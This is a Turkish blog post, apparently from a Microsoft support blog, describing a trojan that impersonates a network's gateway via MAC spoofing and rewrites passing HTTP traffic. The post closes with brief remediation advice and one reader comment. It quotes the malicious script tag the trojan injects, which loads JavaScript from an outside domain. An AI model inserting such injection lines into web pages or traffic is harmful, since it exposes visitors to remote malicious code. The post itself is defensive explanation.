Yine bir virüs…


Son günlerde çokça karşıma çıkan bir virüsten (aslında sanırım bir truva atı) bahsetmek istiyorum. Aslında virüsün çalışma şeklinin ne IIS'le ne de ASP.NET'le bir ilgisi yok. Ancak, web sitelerine erişimde sorun yarattığından sorun yaşayanlar önce bize geldiler ve bu virüsten bu şekilde haberim oldu. Bu açıdan (örneğin 401 hatasına neden olabiliyor) aslında burada bahsettiğim virüsle benzerlikler göstermektedir.


Virüsün teknik detaylarını, nasıl çalıştığını, nasıl bir güvenlik sorununa neden olduğunu bilmiyorum. Internet üzerinde bununla ilgili çok fazla detay bulamadım. Ancak, bizim yaptığımız incelemelere göre, bir makineye bulaştıktan sonra, makinenin bağlı bulunduğu ağdaki "ağ geçidinin" (gateway) MAC adresini "spoof" ediyor. Yani kendisini ağ geçidi gibi gösteriyor. Bu şekilde ağdaki diğer makinelerin trafiğinin kendisi üzerinden geçmesini sağlıyor. Bunu yaptıktan sonra da, kendi üzerinden geçen HTTP trafiğini bozuyor. Bozmaktan tam olarak kastım, bazı "header" bilgilerini siliyor ve HTML kodunun en başına şuna benzer bir satır ekliyor:

<script language="javascript" src="http://v.freefl.info/day.js"></script>

Dolayısıyla, ağdaki herhangi bir makineden birisi Internet'te herhangi bir sayfaya ulaşmaya çalıştığında "days.js" isimli dosyayı da indirmiş oluyor. Bu dosyanın içeriğini tam olarak bilemiyorum. Ben indirmeye çalıştığımda 404 hatası alıyorum. Ancak başka sunucular/adresler kullanarak virüsün yayılmaya devam etmesi olası görünüyor.


ÇÖZÜM:


Bu virüsü, bu yazıyı hazırladığım sırada, tanıyabilen çok fazla antivirüs uygulaması bulunmuyordu. Ancak tahmin ediyorum yakın zamanda tüm antivirüsler tanıyabilecektir. Burada önemli olan nokta şu: Bizim sorunu gözlemlediğimiz makine, çoğu zaman aslında enfekte olan makine olmayacaktır. Virüs, ağdaki herhangi bir makinede bulunuyor olabilir. Belki ağ paketlerini izleyerek hangi makinede olduğunu bulabiliriz. Ama bence her koşulda ağda genel bir tarama yapmak daha doğru olacaktır.


CENK ISCAN


Comments (1)
  1. Mustafa Kaya says:

    Konuyla alakasız olacak ama ufak bi teşekkür etmek istiyorum.

    Uzun süredir RSS readerıma bakmıyordum biraz önce bi bakayım şunlara dedim ve sırf msdn bloglarda 650 tane blog girdisi vardı.Hızlıca başlıklara bakıp geçerken arada Türkçe bir girdi görünce çok mutlu oldum:) ve bunun için size teşekkür etmek istedim..ingilizce dışında genellikle fransızca yazılarla karşılıyordum umarım msdn de ki Türkçe blog sayısı artar.

    Mustafa Kaya

    Microsoft Student Partner

    Erciyes Ü. Bilg Müh.

Comments are closed.

Skip to main content